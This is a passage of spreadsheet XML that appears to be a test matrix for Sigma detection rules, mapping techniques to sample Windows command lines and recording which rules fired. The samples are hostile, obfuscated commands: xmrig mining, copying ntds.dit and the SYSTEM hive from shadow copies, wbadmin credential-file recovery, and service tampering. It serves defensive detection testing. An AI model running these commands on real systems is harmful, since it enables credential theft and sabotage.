      <c r="J69" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K69" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="43" t="inlineStr">
        <is>
          <t>t1496</t>
        </is>
      </c>
      <c r="B70" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_crypto_mining_monero</t>
        </is>
      </c>
      <c r="C70" s="43" t="inlineStr">
        <is>
          <t>Potential Crypto Mining Activity</t>
        </is>
      </c>
      <c r="D70" s="43" t="inlineStr">
        <is>
          <t>66c3b204-9f88-4d0a-a7f7-8a57d521ca55</t>
        </is>
      </c>
      <c r="E70" s="43" t="inlineStr">
        <is>
          <t>xmrig.exe -o stratum+ssl://xmr-pool.example.com:443 -u wallet_address --donate-level=1 --algo rx/0 --cpu-priority=1</t>
        </is>
      </c>
      <c r="F70" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G70" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="43" t="n"/>
      <c r="J70" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K70" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="43" t="inlineStr">
        <is>
          <t>t1496</t>
        </is>
      </c>
      <c r="B71" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_crypto_mining_monero</t>
        </is>
      </c>
      <c r="C71" s="43" t="inlineStr">
        <is>
          <t>Potential Crypto Mining Activity</t>
        </is>
      </c>
      <c r="D71" s="43" t="inlineStr">
        <is>
          <t>66c3b204-9f88-4d0a-a7f7-8a57d521ca55</t>
        </is>
      </c>
      <c r="E71" s="43" t="inlineStr">
        <is>
          <t>xmrig.exe -o stratum+ssl://xmr-pool.example.com:443 -u wallet_address --donate-level=1 --algo rx/0 --nicehash</t>
        </is>
      </c>
      <c r="F71" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G71" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H71" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="43" t="n"/>
      <c r="J71" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K71" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="43" t="inlineStr">
        <is>
          <t>t1496</t>
        </is>
      </c>
      <c r="B72" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_crypto_mining_monero</t>
        </is>
      </c>
      <c r="C72" s="43" t="inlineStr">
        <is>
          <t>Potential Crypto Mining Activity</t>
        </is>
      </c>
      <c r="D72" s="43" t="inlineStr">
        <is>
          <t>66c3b204-9f88-4d0a-a7f7-8a57d521ca55</t>
        </is>
      </c>
      <c r="E72" s="43" t="inlineStr">
        <is>
          <t>xmrig.exe -o stratum+ssl://xmr-pool.example.com:443 -u wallet_address --donate-level=1 --algo rx/0 -o pool.xmr-pool.com:443</t>
        </is>
      </c>
      <c r="F72" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G72" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="43" t="n"/>
      <c r="J72" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K72" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="43" t="inlineStr">
        <is>
          <t>t1496</t>
        </is>
      </c>
      <c r="B73" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_crypto_mining_monero</t>
        </is>
      </c>
      <c r="C73" s="43" t="inlineStr">
        <is>
          <t>Potential Crypto Mining Activity</t>
        </is>
      </c>
      <c r="D73" s="43" t="inlineStr">
        <is>
          <t>66c3b204-9f88-4d0a-a7f7-8a57d521ca55</t>
        </is>
      </c>
      <c r="E73" s="43" t="inlineStr">
        <is>
          <t>xmrig.exe -o stratum+ssl://xmr-pool.example.com:443 -u wallet_address --donate-level=1 --algo rx/0 --cpu-priority=1 --nicehash -o pool.xmr-pool.com:443</t>
        </is>
      </c>
      <c r="F73" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G73" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="43" t="n"/>
      <c r="J73" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K73" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B74" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C74" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D74" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E74" s="43" t="inlineStr">
        <is>
          <t>reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\\ProgramData\\ransom.jpg" /f</t>
        </is>
      </c>
      <c r="F74" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G74" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J74" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K74" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B75" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C75" s="43" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D75" s="43" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E75" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c c^opy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE</t>
        </is>
      </c>
      <c r="F75" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G75" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H75" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="43" t="n"/>
      <c r="J75" s="43" t="n"/>
      <c r="K75" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B76" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sensitive_file_access_shadowcopy</t>
        </is>
      </c>
      <c r="C76" s="43" t="inlineStr">
        <is>
          <t>Sensitive File Access Via Volume Shadow Copy Backup</t>
        </is>
      </c>
      <c r="D76" s="43" t="inlineStr">
        <is>
          <t>f57f8d16-1f39-4dcb-a604-6c73d9b54b3d</t>
        </is>
      </c>
      <c r="E76" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set vsc=\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy&amp;&amp; call copy %%vsc%%1\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM_VSC"</t>
        </is>
      </c>
      <c r="F76" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G76" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H76" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="43" t="n"/>
      <c r="J76" s="43" t="n"/>
      <c r="K76" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="41" t="n"/>
      <c r="B77" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_active_directory_module_dll_import</t>
        </is>
      </c>
      <c r="C77" s="41" t="inlineStr">
        <is>
          <t>Potential Active Directory Enumeration Using AD Module - ProcCreation</t>
        </is>
      </c>
      <c r="D77" s="41" t="inlineStr">
        <is>
          <t>70bc5215-526f-4477-963c-a47a5c9ebd12</t>
        </is>
      </c>
      <c r="E77" s="41" t="n"/>
      <c r="F77" s="41" t="n"/>
      <c r="G77" s="41" t="n"/>
      <c r="H77" s="41" t="n"/>
      <c r="I77" s="41" t="n"/>
      <c r="J77" s="41" t="n"/>
      <c r="K77" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="41" t="n"/>
      <c r="B78" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C78" s="41" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D78" s="41" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E78" s="41" t="n"/>
      <c r="F78" s="41" t="n"/>
      <c r="G78" s="41" t="n"/>
      <c r="H78" s="41" t="n"/>
      <c r="I78" s="41" t="n"/>
      <c r="J78" s="41" t="n"/>
      <c r="K78" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="41" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B79" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C79" s="41" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D79" s="41" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E79" s="41" t="n"/>
      <c r="F79" s="41" t="n"/>
      <c r="G79" s="41" t="n"/>
      <c r="H79" s="41" t="n"/>
      <c r="I79" s="41" t="n"/>
      <c r="J79" s="41" t="n"/>
      <c r="K79" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="41" t="n"/>
      <c r="B80" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_file</t>
        </is>
      </c>
      <c r="C80" s="41" t="inlineStr">
        <is>
          <t>File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D80" s="41" t="inlineStr">
        <is>
          <t>6fe4aa1e-0531-4510-8be2-782154b73b48</t>
        </is>
      </c>
      <c r="E80" s="41" t="n"/>
      <c r="F80" s="41" t="n"/>
      <c r="G80" s="41" t="n"/>
      <c r="H80" s="41" t="n"/>
      <c r="I80" s="41" t="n"/>
      <c r="J80" s="41" t="n"/>
      <c r="K80" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B81" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C81" s="41" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D81" s="41" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E81" s="41" t="inlineStr">
        <is>
          <t>sc.exe "stop" spooler</t>
        </is>
      </c>
      <c r="F81" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G81" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H81" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I81" s="41" t="n"/>
      <c r="J81" s="41" t="n"/>
      <c r="K81" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B82" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C82" s="41" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D82" s="41" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E82" s="41" t="inlineStr">
        <is>
          <t>sc.exe	stop	spooler</t>
        </is>
      </c>
      <c r="F82" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G82" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H82" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I82" s="41" t="n"/>
      <c r="J82" s="41" t="n"/>
      <c r="K82" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B83" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C83" s="41" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D83" s="41" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E83" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe -Change -TN "\Microsoft\Windows\SystemRestore\SR" -disable</t>
        </is>
      </c>
      <c r="F83" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G83" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H83" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I83" s="41" t="n"/>
      <c r="J83" s="41" t="n"/>
      <c r="K83" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B84" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C84" s="41" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D84" s="41" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E84" s="41" t="inlineStr">
        <is>
          <t>sc.exe config "BITS" start= disabled</t>
        </is>
      </c>
      <c r="F84" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G84" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H84" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I84" s="41" t="n"/>
      <c r="J84" s="41" t="n"/>
      <c r="K84" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B85" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C85" s="41" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D85" s="41" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E85" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Service -Name '*BITS*' | Set-Service -Status Stopped"</t>
        </is>
      </c>
      <c r="F85" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G85" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H85" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I85" s="41" t="n"/>
      <c r="J85" s="41" t="n"/>
      <c r="K85" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B86" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C86" s="41" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D86" s="41" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E86" s="41" t="inlineStr">
        <is>
          <t>"cmd.exe" /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\..\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit</t>
        </is>
      </c>
      <c r="F86" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G86" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="41" t="n"/>
      <c r="J86" s="41" t="n"/>
      <c r="K86" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B87" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C87" s="41" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D87" s="41" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E87" s="41" t="inlineStr">
        <is>
          <t>"cmd.exe" /c c^o^p^y \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit</t>
        </is>
      </c>
      <c r="F87" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G87" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H87" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="41" t="n"/>
      <c r="J87" s="41" t="n"/>
      <c r="K87" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B88" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C88" s="41" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D88" s="41" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E88" s="41" t="inlineStr">
        <is>
          <t>"cmd.exe" /c copy	\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit	C:\Windows\Temp\ntds.dit</t>
        </is>
      </c>
      <c r="F88" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G88" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="41" t="n"/>
      <c r="J88" s="41" t="n"/>
      <c r="K88" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B89" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sensitive_file_access_shadowcopy</t>
        </is>
      </c>
      <c r="C89" s="41" t="inlineStr">
        <is>
          <t>Sensitive File Access Via Volume Shadow Copy Backup</t>
        </is>
      </c>
      <c r="D89" s="41" t="inlineStr">
        <is>
          <t>f57f8d16-1f39-4dcb-a604-6c73d9b54b3d</t>
        </is>
      </c>
      <c r="E89" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$vsc = '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1'; Copy-Item -Path \"$vsc\Windows\NTDS\NTDS.dit\" -Destination 'C:\Windows\Temp\ntds.dit'"</t>
        </is>
      </c>
      <c r="F89" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G89" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I89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Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Sensitive File Access Via Volume Shadow Copy Backup (f57f8d16-1f39-4dcb-a604-6c73d9b54b3d); Sensitive File Access Via Volume Shadow Copy Backup (f57f8d16-1f39-4dcb-a604-6c73d9b54b3d); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J89" s="41" t="n"/>
      <c r="K89" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B90" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_file</t>
        </is>
      </c>
      <c r="C90" s="41" t="inlineStr">
        <is>
          <t>File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D90" s="41" t="inlineStr">
        <is>
          <t>6fe4aa1e-0531-4510-8be2-782154b73b48</t>
        </is>
      </c>
      <c r="E90" s="41" t="inlineStr">
        <is>
          <t>wbadmin.exe  start  recovery -version:05/10/2024-10:00 -itemtype:File -items:C:\Windows\NTDS\ntds.dit -recoveryTarget:C:\Restored</t>
        </is>
      </c>
      <c r="F90" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G90" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I90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Sensitive File Dump Via Wbadmin.EXE (8b93a509-1cb8-42e1-97aa-ee24224cdc15); Sensitive File Recovery From Backup Via Wbadmin.EXE (84972c80-251c-4c3a-9079-4f00aad93938); File Recovery From Backup Via Wbadmin.EXE (6fe4aa1e-0531-4510-8be2-782154b73b48)</t>
        </is>
      </c>
      <c r="J90" s="41" t="n"/>
      <c r="K90" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B91" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_file</t>
        </is>
      </c>
      <c r="C91" s="41" t="inlineStr">
        <is>
          <t>File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D91" s="41" t="inlineStr">
        <is>
          <t>6fe4aa1e-0531-4510-8be2-782154b73b48</t>
        </is>
      </c>
      <c r="E91" s="41" t="inlineStr">
        <is>
          <t>wbadmin.exe start "recovery" -version:05/10/2024-10:00 -itemtype:File -items:C:\Windows\NTDS\ntds.dit -recoveryTarget:C:\Restored</t>
        </is>
      </c>
      <c r="F91" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G91" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H91" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I91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Sensitive File Dump Via Wbadmin.EXE (8b93a509-1cb8-42e1-97aa-ee24224cdc15)</t>
        </is>
      </c>
      <c r="J91" s="41" t="n"/>
      <c r="K91" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B92" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_file</t>
        </is>
      </c>
      <c r="C92" s="41" t="inlineStr">
        <is>
          <t>File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D92" s="41" t="inlineStr">
        <is>
          <t>6fe4aa1e-0531-4510-8be2-782154b73b48</t>
        </is>
      </c>
      <c r="E92" s="41" t="inlineStr">
        <is>
          <t>wbadmin.exe start recovery -version:05/10/2024-10:00 "-itemtype:File" -items:C:\Windows\NTDS\ntds.dit -recoveryTarget:C:\Restored</t>
        </is>
      </c>
      <c r="F92" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G92" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I92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Sensitive File Dump Via Wbadmin.EXE (8b93a509-1cb8-42e1-97aa-ee24224cdc15); Sensitive File Recovery From Backup Via Wbadmin.EXE (84972c80-251c-4c3a-9079-4f00aad93938); File Recovery From Backup Via Wbadmin.EXE (6fe4aa1e-0531-4510-8be2-782154b73b48)</t>
        </is>
      </c>
      <c r="J92" s="41" t="n"/>
      <c r="K92" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B93" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_file</t>
        </is>
      </c>
      <c r="C93" s="41" t="inlineStr">
        <is>
          <t>File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D93" s="41" t="inlineStr">
        <is>
          <t>6fe4aa1e-0531-4510-8be2-782154b73b48</t>
        </is>
      </c>
      <c r="E93" s="41" t="inlineStr">
        <is>
          <t>wbadmin.exe start ^r^e^c^o^v^e^r^y -version:05/10/2024-10:00 -itemtype:File -items:C:\Windows\NTDS\ntds.dit -recoveryTarget:C:\Restored</t>
        </is>
      </c>
      <c r="F93" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G93" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I93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Sensitive File Dump Via Wbadmin.EXE (8b93a509-1cb8-42e1-97aa-ee24224cdc15); Sensitive File Recovery From Backup Via Wbadmin.EXE (84972c80-251c-4c3a-9079-4f00aad93938); File Recovery From Backup Via Wbadmin.EXE (6fe4aa1e-0531-4510-8be2-782154b73b48)</t>
        </is>
      </c>
      <c r="J93" s="41" t="n"/>
      <c r="K93" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="41" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B94" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_wbadmin_restore_file</t>
        </is>
      </c>
      <c r="C94" s="41" t="inlineStr">
        <is>
          <t>File Recovery From Backup Via Wbadmin.EXE</t>
        </is>
      </c>
      <c r="D94" s="41" t="inlineStr">
        <is>
          <t>6fe4aa1e-0531-4510-8be2-782154b73b48</t>
        </is>
      </c>
      <c r="E94" s="41" t="inlineStr">
        <is>
          <t>wbadmin.exe start recovery -version:05/10/2024-10:00 -itemtype=File -items:C:\Windows\NTDS\ntds.dit -recoveryTarget=C:\Restored</t>
        </is>
      </c>
      <c r="F94" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G94" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H94" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="41" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Sensitive File Dump Via Wbadmin.EXE (8b93a509-1cb8-42e1-97aa-ee24224cdc15)</t>
        </is>
      </c>
      <c r="J94" s="41" t="n"/>
      <c r="K94" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B95" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C95" s="41" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D95" s="41" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E95" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Stop-Service -Name 'fax' -Force -ErrorAction SilentlyContinue; Set-Service -Name 'fax' -BinaryPathName '$env:windir\system32\notepad.exe'; Start-Service -Name 'fax' -ErrorAction SilentlyContinue}"</t>
        </is>
      </c>
      <c r="F95" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G95" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="41" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006); Stop Windows Service Via PowerShell Stop-Service (c49c5062-0966-4170-9efd-9968c913a6cf)</t>
        </is>
      </c>
      <c r="J95" s="41" t="n"/>
      <c r="K95" s="41" t="b">
        <v>0</v>
